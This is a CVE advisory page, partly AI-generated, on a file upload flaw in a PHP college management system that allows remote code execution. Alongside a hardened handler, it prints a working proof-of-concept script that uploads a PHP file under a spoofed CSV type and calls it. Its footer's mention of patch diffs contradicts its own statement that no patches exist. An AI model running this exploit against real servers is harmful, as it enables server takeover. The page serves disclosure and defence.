CVE-2026-11333
Description
Unrestricted file upload vulnerability in CollegeManagementSystem allows remote code execution by uploading a crafted PHP file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A security vulnerability exists in the Student Data Upload Endpoint of tittuvarghese CollegeManagementSystem, specifically within dashboard_page/forms/upload_student_data.php. The component performs a superficial MIME-type check that relies on the client-supplied Content-Type header, allowing an attacker to bypass it. The file extension is also taken directly from the user-supplied filename without validation. The project uses a rolling release model, so specific affected and updated versions are not detailed.
Exploitation
An attacker who can reach the upload form can exploit this vulnerability remotely; the CVSS preconditions recorded for this entry list PR:L, so a low-privileged account is assumed rather than an unauthenticated attacker. The attacker crafts a PHP payload and submits a multipart POST request to upload_student_data.php that includes the expected student data parameters and the PHP file in the Student-Data-CSV field, with the file part's Content-Type header set to application/csv and a filename ending in .php (e.g., shell.php). The server may respond with a CSV format error, but the file is still written to disk.
Impact
Successful exploitation allows an attacker to achieve remote code execution (RCE) by uploading a web shell. The server stores the uploaded file in the web-accessible dashboard_page/forms/uploads/ directory under a predictable filename derived from other form fields. The attacker can then access this file directly via a URL to execute arbitrary PHP code on the server.
Mitigation
This vulnerability has been publicly disclosed; the project was informed early via an issue report but has neither responded nor released a fix [1], [2]. As the project uses a rolling release model and version details are unavailable, no patched version can be identified. No workarounds or EOL status are mentioned in the available references.
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- 3 product entries listed, none with a CPE identifier
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The student data upload endpoint performs a superficial MIME-type check that relies entirely on the client-supplied Content-Type header and does not validate the file extension."
Attack vector
An attacker can remotely exploit this vulnerability by crafting a malicious PHP file and uploading it via the Student Data CSV upload endpoint. The attacker sets the file part's Content-Type header to 'application/csv' and uses a filename ending in '.php'. The server then stores the file in the web-accessible 'uploads/' directory, and the attacker executes arbitrary PHP code by requesting the uploaded file directly. [ref_id=1]
Affected code
The vulnerability resides in the `upload_student_data.php` file, specifically within lines 21-33. The code snippet shows that the file type check is `($_FILES["Student-Data-CSV"]["type"] == "application/csv")`, which is easily bypassable. Additionally, the filename is constructed using `PATHINFO_EXTENSION` directly from user input, without any sanitization or whitelisting. [ref_id=1]
What the fix does
The advisory does not specify any patches or remediation steps. The project has been informed of the vulnerability but has not yet responded. Therefore, no fix is currently available.
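Since the project has shipped no fix, the following is an added example rather than the project's own code or a patch it has released: the acceptance test the advisory describes (the client-supplied Content-Type compared to application/csv) beside a hardened handler that sniffs the bytes on disk instead of trusting the header, allowlists the extension, requires the content to parse as CSV, and stores the file under a random server-chosen name outside the web root. The field name Student-Data-CSV comes from the advisory; the storage directory, size limit and all function names are assumptions.

```php
<?php
// Added example, not the project's code and not a patch it has shipped: the
// vulnerable acceptance test the advisory quotes, beside a hardened version.
// Field name Student-Data-CSV is from the advisory; STORAGE_DIR, MAX_BYTES and
// all function names are assumptions.
declare(strict_types=1);

const UPLOAD_FIELD = 'Student-Data-CSV';
const STORAGE_DIR  = '/var/lib/cms/student-data';   // assumed: outside the document root
const MAX_BYTES    = 5 * 1024 * 1024;

/** The check described in the advisory: trusts the client-sent part Content-Type. */
function vulnerable_accepts(array $file): bool
{
    return $file['type'] == 'application/csv';
}

/**
 * Content-based checks that ignore the client's Content-Type entirely.
 * Returns null when the file is acceptable, otherwise the reason it is not.
 */
function reject_reason(string $path, string $clientName): ?string
{
    if (!is_file($path) || filesize($path) === 0) {
        return 'empty or missing file';
    }
    if (filesize($path) > MAX_BYTES) {
        return 'too large';
    }
    // Extension allowlist on the client-supplied name; the name itself is never reused.
    if (strtolower(pathinfo($clientName, PATHINFO_EXTENSION)) !== 'csv') {
        return 'extension not allowed';
    }
    // libmagic sniffing of the bytes on disk, not the header from the request.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if (!in_array($detected, ['text/csv', 'text/plain'], true)) {
        return "detected type $detected not allowed";
    }
    // Defence in depth: a PHP open tag has no business in student data.
    if (stripos((string) file_get_contents($path, false, null, 0, 8192), '<?') !== false) {
        return 'PHP open tag in content';
    }
    // Must parse as CSV with a consistent column count.
    $fh = fopen($path, 'r');
    $cols = null;
    while (($row = fgetcsv($fh, null, ',', '"', '\\')) !== false) {
        if ($row === [null]) {          // blank line
            continue;
        }
        $cols ??= count($row);
        if (count($row) !== $cols) {
            fclose($fh);
            return 'inconsistent column count';
        }
    }
    fclose($fh);
    return $cols === null ? 'no CSV rows' : null;
}

/** Request-time handler: upload checks, content checks, then a server-chosen name. */
function store_student_csv(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a successful upload');
    }
    if (($why = reject_reason($file['tmp_name'], $file['name'])) !== null) {
        throw new RuntimeException("rejected: $why");
    }
    // Random name, fixed extension, no form field involved: nothing for an attacker to predict.
    $dest = STORAGE_DIR . '/' . bin2hex(random_bytes(16)) . '.csv';
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move upload');
    }
    chmod($dest, 0640);
    return $dest;
}

// CLI demonstration with two constructed files: a real CSV and the advisory's payload.
if (PHP_SAPI === 'cli') {
    $csv = tempnam(sys_get_temp_dir(), 'cms');
    file_put_contents($csv, "roll,name\n1,Ada\n2,Linus\n");
    $php = tempnam(sys_get_temp_dir(), 'cms');
    file_put_contents($php, "<?php echo md5('123456789'); ?>");

    $spoofed = ['type' => 'application/csv'];   // what a crafted request claims
    printf("vulnerable check, spoofed header: %s\n", vulnerable_accepts($spoofed) ? 'accept' : 'reject');
    printf("hardened, real CSV as data.csv : %s\n", reject_reason($csv, 'data.csv') ?? 'accept');
    printf("hardened, payload as shell.php : %s\n", reject_reason($php, 'shell.php'));
    printf("hardened, payload as shell.csv : %s\n", reject_reason($php, 'shell.csv'));
    unlink($csv);
    unlink($php);
}
```

Run with `php hardened_upload.php` to see the spoofed header accepted by the original check and rejected by each layer of the hardened one; at request time, `store_student_csv($_FILES[UPLOAD_FIELD])` is the only entry point. Storing under a random name outside the document root is what removes the remote code execution even if a later check is bypassed, because nothing in that directory is ever served.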
Preconditions
- auth: the attacker needs 'PR:L' privileges, i.e. a low-privileged account that can reach the upload functionality.
- network: the attack can be launched remotely (AV:N).
Reproduction
- Craft a PHP payload (e.g., <?php echo md5('123456789'); ?>).
- Submit a multipart POST request to upload_student_data.php with the student data parameters (Department, Program, Course, Batch, Year of Admission) and the Student-Data-CSV file field set to the PHP file, with Content-Type: application/csv and filename=shell.php.
- The server responds with a CSV format error message, but the file is stored on disk.
- Calculate the saved filename: {Program}{Department}{Course}{Batch}{YOA}.php (e.g., XXYYZZBB2011.php).
- Access http://127.0.0.1:3000/dashboard_page/forms/uploads/XXYYZZBB2011.php. The PHP code is executed and its output (e.g., 25f9e794323b453885f5181f1b624d0b) is returned. [ref_id=1]
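The request described above assembled as a script, added here as an example and not taken from the reference or the project. The field name Student-Data-CSV, the spoofed Content-Type, the payload and the saved-name pattern come from the advisory; the POST parameter names (Department, Program, Course, Batch, YOA) and the base URL passed on the command line are assumptions, since the reference as summarised here does not give the exact form field names.

```php
<?php
// Added example, not from the advisory or the project: builds the multipart
// request the reproduction steps describe and predicts where the file lands.
// Assumptions: the POST parameter names Department, Program, Course, Batch
// and YOA, and the base URL in $argv[1]. The field name Student-Data-CSV, the
// spoofed Content-Type and the saved-name pattern come from the advisory.
declare(strict_types=1);

const UPLOAD_PATH = '/dashboard_page/forms/upload_student_data.php';
const UPLOADS_DIR = '/dashboard_page/forms/uploads/';
const FILE_FIELD  = 'Student-Data-CSV';

/** Stored name per the advisory: {Program}{Department}{Course}{Batch}{YOA} + client extension. */
function predicted_filename(array $fields, string $clientName): string
{
    $ext = pathinfo($clientName, PATHINFO_EXTENSION);   // same derivation the advisory describes
    return $fields['Program'] . $fields['Department'] . $fields['Course']
         . $fields['Batch'] . $fields['YOA'] . '.' . $ext;
}

/** Raw multipart/form-data body; the file part carries the spoofed Content-Type. */
function build_multipart(string $boundary, array $fields, string $clientName, string $payload): string
{
    $body = '';
    foreach ($fields as $name => $value) {
        $body .= "--$boundary\r\n"
               . "Content-Disposition: form-data; name=\"$name\"\r\n\r\n"
               . "$value\r\n";
    }
    $body .= "--$boundary\r\n"
           . "Content-Disposition: form-data; name=\"" . FILE_FIELD . "\"; filename=\"$clientName\"\r\n"
           . "Content-Type: application/csv\r\n\r\n"   // this is all $_FILES[...]['type'] sees
           . "$payload\r\n"
           . "--$boundary--\r\n";
    return $body;
}

/** POSTs the body with the http stream wrapper; returns the response body or false. */
function post_multipart(string $url, string $body, string $boundary): string|false
{
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
        'content'       => $body,
        'ignore_errors' => true,   // keep the body even on a 4xx/5xx
    ]]);
    return @file_get_contents($url, false, $ctx);
}

// Values from the advisory's own walkthrough (XX YY ZZ BB 2011 -> XXYYZZBB2011.php).
$fields   = ['Department' => 'YY', 'Program' => 'XX', 'Course' => 'ZZ', 'Batch' => 'BB', 'YOA' => '2011'];
$payload  = "<?php echo md5('123456789'); ?>";
$boundary = '----cms' . bin2hex(random_bytes(8));
$body     = build_multipart($boundary, $fields, 'shell.php', $payload);

$stored = UPLOADS_DIR . predicted_filename($fields, 'shell.php');
echo "predicted stored path: $stored\n";

$base = $argv[1] ?? null;   // e.g. http://127.0.0.1:3000 ; omit to only print the plan
if ($base !== null) {
    post_multipart($base . UPLOAD_PATH, $body, $boundary);   // a CSV-format error is expected here
    $out = @file_get_contents($base . $stored);
    echo "response from stored file: ", var_export($out, true), "\n";
    // A body of 25f9e794323b453885f5181f1b624d0b (md5 of 123456789) confirms execution.
}
```

Run as `php poc.php` to print the predicted path only, or `php poc.php http://127.0.0.1:3000` against a test instance you are authorised to assess; if the form requires a session, the http context needs a Cookie header added, which this script omits. The two functions separate the two things worth verifying independently: that the server accepts the spoofed part type, and that the stored name really is composed from the form fields.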
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5 references are linked to this record; the entries themselves are not reproduced on this page.
News mentions: no linked articles in our index yet.